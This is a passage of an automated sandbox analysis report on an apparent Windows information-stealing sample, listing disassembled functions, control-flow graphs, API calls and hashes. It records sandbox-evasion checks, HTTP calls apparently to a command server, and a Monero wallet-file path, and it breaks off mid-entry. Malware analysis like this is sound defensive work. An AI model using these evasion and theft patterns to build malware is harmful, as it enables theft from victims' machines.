                              Function 00686280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 686280-68630b call 69a7a0 call 6847b0 call 69a740 InternetOpenA StrCmpCA 1040 68630d 1033->1040 1041 686314-686318 1033->1041 1040->1041 1042 686509-686525 call 69a7a0 call 69a800 * 2 1041->1042 1043 68631e-686342 InternetConnectA 1041->1043 1061 686528-68652d 1042->1061 1044 686348-68634c 1043->1044 1045 6864ff-686503 InternetCloseHandle 1043->1045 1048 68635a 1044->1048 1049 68634e-686358 1044->1049 1045->1042 1051 686364-686392 HttpOpenRequestA 1048->1051 1049->1051 1053 686398-68639c 1051->1053 1054 6864f5-6864f9 InternetCloseHandle 1051->1054 1056 68639e-6863bf InternetSetOptionA 1053->1056 1057 6863c5-686405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1059 68642c-68644b call 698940 1057->1059 1060 686407-686427 call 69a740 call 69a800 * 2 1057->1060 1067 6864c9-6864e9 call 69a740 call 69a800 * 2 1059->1067 1068 68644d-686454 1059->1068 1060->1061 1067->1061 1071 686456-686480 InternetReadFile 1068->1071 1072 6864c7-6864ef InternetCloseHandle 1068->1072 1076 68648b 1071->1076 1077 686482-686489 1071->1077 1072->1054 1076->1072 1077->1076 1080 68648d-6864c5 call 69a9b0 call 69a8a0 call 69a800 1077->1080 1080->1071
                              APIs
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                                • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • InternetOpenA.WININET(006A0DFE,00000001,00000000,00000000,00000000), ref: 006862E1
                              • StrCmpCA.SHLWAPI(?,0148E838), ref: 00686303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686335
                              • HttpOpenRequestA.WININET(00000000,GET,?,0148DF30,00000000,00000000,00400100,00000000), ref: 00686385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006863BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006863D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006863FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0068646D
                              • InternetCloseHandle.WININET(00000000), ref: 006864EF
                              • InternetCloseHandle.WININET(00000000), ref: 006864F9
                              • InternetCloseHandle.WININET(00000000), ref: 00686503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: c98ed0f7d7054063e2628425d161114b4c2248fce51ccc2486a9c459bc7dfd50
                              • Instruction ID: 47a761aee08d2206fdea0ae03e249894aeded9a15a3b784e257accfab250e3f5
                              • Opcode Fuzzy Hash: c98ed0f7d7054063e2628425d161114b4c2248fce51ccc2486a9c459bc7dfd50
                              • Instruction Fuzzy Hash: 6F713071A00218ABDF14EBE0DC49FEE77BAFB44704F108158F50A6B590DBB46A85CF91
                              Function 00695510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 695510-695577 call 695ad0 call 69a820 * 3 call 69a740 * 4 1106 69557c-695583 1090->1106 1107 695585-6955b6 call 69a820 call 69a7a0 call 681590 call 6951f0 1106->1107 1108 6955d7-69564c call 69a740 * 2 call 681590 call 6952c0 call 69a8a0 call 69a800 call 69aad0 StrCmpCA 1106->1108 1124 6955bb-6955d2 call 69a8a0 call 69a800 1107->1124 1134 695693-6956a9 call 69aad0 StrCmpCA 1108->1134 1138 69564e-69568e call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1108->1138 1124->1134 1139 6957dc-695844 call 69a8a0 call 69a820 * 2 call 681670 call 69a800 * 4 call 696560 call 681550 1134->1139 1140 6956af-6956b6 1134->1140 1138->1134 1270 695ac3-695ac6 1139->1270 1143 6957da-69585f call 69aad0 StrCmpCA 1140->1143 1144 6956bc-6956c3 1140->1144 1162 695991-6959f9 call 69a8a0 call 69a820 * 2 call 681670 call 69a800 * 4 call 696560 call 681550 1143->1162 1163 695865-69586c 1143->1163 1147 69571e-695793 call 69a740 * 2 call 681590 call 6952c0 call 69a8a0 call 69a800 call 69aad0 StrCmpCA 1144->1147 1148 6956c5-695719 call 69a820 call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1144->1148 1147->1143 1249 695795-6957d5 call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1147->1249 1148->1143 1162->1270 1170 69598f-695a14 call 69aad0 StrCmpCA 1163->1170 1171 695872-695879 1163->1171 1199 695a28-695a91 call 69a8a0 call 69a820 * 2 call 681670 call 69a800 * 4 call 696560 call 681550 1170->1199 1200 695a16-695a21 Sleep 1170->1200 1178 69587b-6958ce call 69a820 call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1171->1178 1179 6958d3-695948 call 69a740 * 2 call 681590 call 6952c0 call 69a8a0 call 69a800 call 69aad0 StrCmpCA 1171->1179 1178->1170 1179->1170 1275 69594a-69598a call 69a7a0 call 681590 call 6951f0 call 69a8a0 call 69a800 1179->1275 1199->1270 1200->1106 1249->1143 1275->1170
                              APIs
                                • Part of subcall function 0069A820: lstrlen.KERNEL32(00684F05,?,?,00684F05,006A0DDE), ref: 0069A82B
                                • Part of subcall function 0069A820: lstrcpy.KERNEL32(006A0DDE,00000000), ref: 0069A885
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006956A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695857
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695228
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 006952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695318
                                • Part of subcall function 006952C0: lstrlen.KERNEL32(00000000), ref: 0069532F
                                • Part of subcall function 006952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00695364
                                • Part of subcall function 006952C0: lstrlen.KERNEL32(00000000), ref: 00695383
                                • Part of subcall function 006952C0: lstrlen.KERNEL32(00000000), ref: 006953AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0069578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00695A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 8e11155d94b10eabb3d44939b2d00956f17c7eadaddf05eb5f87ba749bed25df
                              • Instruction ID: cfc8ece2cffd31d26b3e5dbe0e4796384bbf37e3e962b825b63d9111d0cb924e
                              • Opcode Fuzzy Hash: 8e11155d94b10eabb3d44939b2d00956f17c7eadaddf05eb5f87ba749bed25df
                              • Instruction Fuzzy Hash: D1E12E719101089ACF58FBE0DD56EED73BEAB54300F50812CB50766991EF346A0ACBDA
                              Function 006917A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 6917a0-6917cd call 69aad0 StrCmpCA 1304 6917cf-6917d1 ExitProcess 1301->1304 1305 6917d7-6917f1 call 69aad0 1301->1305 1309 6917f4-6917f8 1305->1309 1310 6917fe-691811 1309->1310 1311 6919c2-6919cd call 69a800 1309->1311 1312 69199e-6919bd 1310->1312 1313 691817-69181a 1310->1313 1312->1309 1315 691849-691858 call 69a820 1313->1315 1316 6918ad-6918be StrCmpCA 1313->1316 1317 6918cf-6918e0 StrCmpCA 1313->1317 1318 69198f-691999 call 69a820 1313->1318 1319 691821-691830 call 69a820 1313->1319 1320 69185d-69186e StrCmpCA 1313->1320 1321 69187f-691890 StrCmpCA 1313->1321 1322 6918f1-691902 StrCmpCA 1313->1322 1323 691951-691962 StrCmpCA 1313->1323 1324 691970-691981 StrCmpCA 1313->1324 1325 691913-691924 StrCmpCA 1313->1325 1326 691932-691943 StrCmpCA 1313->1326 1327 691835-691844 call 69a820 1313->1327 1315->1312 1329 6918ca 1316->1329 1330 6918c0-6918c3 1316->1330 1331 6918ec 1317->1331 1332 6918e2-6918e5 1317->1332 1318->1312 1319->1312 1348 69187a 1320->1348 1349 691870-691873 1320->1349 1350 69189e-6918a1 1321->1350 1351 691892-69189c 1321->1351 1333 69190e 1322->1333 1334 691904-691907 1322->1334 1339 69196e 1323->1339 1340 691964-691967 1323->1340 1342 69198d 1324->1342 1343 691983-691986 1324->1343 1335 691930 1325->1335 1336 691926-691929 1325->1336 1337 69194f 1326->1337 1338 691945-691948 1326->1338 1327->1312 1329->1312 1330->1329 1331->1312 1332->1331 1333->1312 1334->1333 1335->1312 1336->1335 1337->1312 1338->1337 1339->1312 1340->1339 1342->1312 1343->1342 1348->1312 1349->1348 1352 6918a8 1350->1352 1351->1352 1352->1312
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 006917C5
                              • ExitProcess.KERNEL32 ref: 006917D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: a2b47c7b1d50cd331285bb15723739c7c79dc9680d8a21305941ef60d7a24bb1
                              • Instruction ID: d860e7095936b6e36769a414f5fda2302a463322563389fbba66acd3682fd0c7
                              • Opcode Fuzzy Hash: a2b47c7b1d50cd331285bb15723739c7c79dc9680d8a21305941ef60d7a24bb1
                              • Instruction Fuzzy Hash: 7F514EB5A0420AEFDF04EFA0DA64ABE77BAFF45704F204059E4056B740D770E952DB62
                              Function 00697500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 697500-69754a GetWindowsDirectoryA 1357 69754c 1356->1357 1358 697553-6975c7 GetVolumeInformationA call 698d00 * 3 1356->1358 1357->1358 1365 6975d8-6975df 1358->1365 1366 6975fc-697617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 6975e1-6975fa call 698d00 1365->1367 1368 697619-697626 call 69a740 1366->1368 1369 697628-697658 wsprintfA call 69a740 1366->1369 1367->1365 1377 69767e-69768e 1368->1377 1369->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00697542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0069757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0069760A
                              • wsprintfA.USER32 ref: 00697640
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\$j
                              • API String ID: 1544550907-1061487577
                              • Opcode ID: 7482ac05aba658fb4ec23b0a4ec181d9241fa54664e38680b5384cda01aed22b
                              • Instruction ID: 973278ff170cfbe322c18ba6ca48d485ac51b659e5dd64a75b86a32bea6ea52c
                              • Opcode Fuzzy Hash: 7482ac05aba658fb4ec23b0a4ec181d9241fa54664e38680b5384cda01aed22b
                              • Instruction Fuzzy Hash: 9B417CB1D04248ABDF10DF94DC85FEEBBB9BF18704F100199F509A7280DB78AA44CBA5
                              Function 006969F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482398), ref: 006998A1
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482320), ref: 006998BA
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,014824E8), ref: 006998D2
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482440), ref: 006998EA
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482500), ref: 00699903
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,014890A8), ref: 0069991B
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01475B90), ref: 00699933
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01475AB0), ref: 0069994C
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482350), ref: 00699964
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482470), ref: 0069997C
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482488), ref: 00699995
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,014822D8), ref: 006999AD
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01475DD0), ref: 006999C5
                                • Part of subcall function 00699860: GetProcAddress.KERNEL32(74DD0000,01482290), ref: 006999DE
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 006811D0: ExitProcess.KERNEL32 ref: 00681211
                                • Part of subcall function 00681160: GetSystemInfo.KERNEL32(?), ref: 0068116A
                                • Part of subcall function 00681160: ExitProcess.KERNEL32 ref: 0068117E
                                • Part of subcall function 00681110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0068112B
                                • Part of subcall function 00681110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00681132
                                • Part of subcall function 00681110: ExitProcess.KERNEL32 ref: 00681143
                                • Part of subcall function 00681220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0068123E
                                • Part of subcall function 00681220: __aulldiv.LIBCMT ref: 00681258
                                • Part of subcall function 00681220: __aulldiv.LIBCMT ref: 00681266
                                • Part of subcall function 00681220: ExitProcess.KERNEL32 ref: 00681294
                                • Part of subcall function 00696770: GetUserDefaultLangID.KERNEL32 ref: 00696774
                                • Part of subcall function 00681190: ExitProcess.KERNEL32 ref: 006811C6
                                • Part of subcall function 00697850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697880
                                • Part of subcall function 00697850: RtlAllocateHeap.NTDLL(00000000), ref: 00697887
                                • Part of subcall function 00697850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0069789F
                                • Part of subcall function 006978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697910
                                • Part of subcall function 006978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00697917
                                • Part of subcall function 006978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0069792F
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01488FA8,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00696AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00696AF9
                              • Sleep.KERNEL32(00001770), ref: 00696B04
                              • CloseHandle.KERNEL32(?,00000000,?,01488FA8,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696B1A
                              • ExitProcess.KERNEL32 ref: 00696B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 745c9267c832c08cffcdf7ffcf490bf2448e570b142de62ce54f2308fa8e89ae
                              • Instruction ID: 8a88e5bffc9ed59d1d36f04bdf959560f74341457ec5d5fe8cf612b988328366
                              • Opcode Fuzzy Hash: 745c9267c832c08cffcdf7ffcf490bf2448e570b142de62ce54f2308fa8e89ae
                              • Instruction Fuzzy Hash: 4C311A70910208AADF44F7E0DD56AEE77BEBF15740F00461CF202A6581DF705905CBAA
                              Function 00681220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 681220-681247 call 6989b0 GlobalMemoryStatusEx 1439 681249-681271 call 69da00 * 2 1436->1439 1440 681273-68127a 1436->1440 1441 681281-681285 1439->1441 1440->1441 1443 68129a-68129d 1441->1443 1444 681287 1441->1444 1446 681289-681290 1444->1446 1447 681292-681294 ExitProcess 1444->1447 1446->1443 1446->1447
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0068123E
                              • __aulldiv.LIBCMT ref: 00681258
                              • __aulldiv.LIBCMT ref: 00681266
                              • ExitProcess.KERNEL32 ref: 00681294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 6d7a5d875a1c30e75879e893898dec875d45deae6ae5572c5de064726cef8e7e
                              • Instruction ID: ed1a3f6af167de9d9e8255058f6cb231cfea9303e336892257384aa3d2de76ec
                              • Opcode Fuzzy Hash: 6d7a5d875a1c30e75879e893898dec875d45deae6ae5572c5de064726cef8e7e
                              • Instruction Fuzzy Hash: 61014BB0940308AAEF10EBE4CC5AF9EBB7DAB05705F208158E605BA280D67456868799
                              Function 00696AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 696af3 1451 696b0a 1450->1451 1453 696aba-696ad7 call 69aad0 OpenEventA 1451->1453 1454 696b0c-696b22 call 696920 call 695b10 CloseHandle ExitProcess 1451->1454 1459 696ad9-696af1 call 69aad0 CreateEventA 1453->1459 1460 696af5-696b04 CloseHandle Sleep 1453->1460 1459->1454 1460->1451
                              APIs
